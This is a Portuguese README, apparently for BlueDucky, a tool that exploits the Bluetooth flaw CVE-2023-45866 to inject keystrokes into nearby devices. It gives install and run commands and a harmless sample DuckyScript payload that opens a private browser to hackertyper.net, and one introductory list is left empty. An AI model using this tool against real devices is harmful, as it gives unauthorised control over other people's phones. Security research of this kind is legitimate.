
BlueDucky explora uma vulnerabilidade Bluetooth, especificamente CVE-2023-45866, que permite a um atacante injetar pressionamentos de teclas em um dispositivo alvo. O dispositivo do atacante se faz passar por um teclado Bluetooth para estabelecer uma conexão criptografada sem autorização do usuário. A ferramenta BlueDucky automatiza esse processo.
Agradecimentos a todas as pessoas do HackNexus. Certifique-se de se juntar a nós no VC ! https://discord.gg/HackNexus
NOTAS: Não poderei executar isto num portátil ou outro dispositivo que não seja um raspberry pi para testes. Devido a isso, quaisquer problemas que tenhas terão de ser resolvidos entre vocês, pois não tenho fundos extras para comprar um adaptador.
🚨 CVE-2023-45866 - Implementação BlueDucky (Usando DuckyScript)
🔓 Emparelhamento Não Autenticado Levando à Execução de Código (Usando Teclado HID)
Esta é uma implementação do CVE descoberto por marcnewlin
BlueDucky é uma ferramenta poderosa para explorar uma vulnerabilidade em dispositivos Bluetooth. Ao executar este script, você pode:
Executei isto com sucesso num Raspberry Pi 4 usando o módulo Bluetooth padrão. Funciona contra vários telemóveis, com uma exceção interessante para uma marca da Nova Zelândia, a Vodafone.
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
alternativamente,
pip3 install -r requirements.txt
🚧 Em andamento:
REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300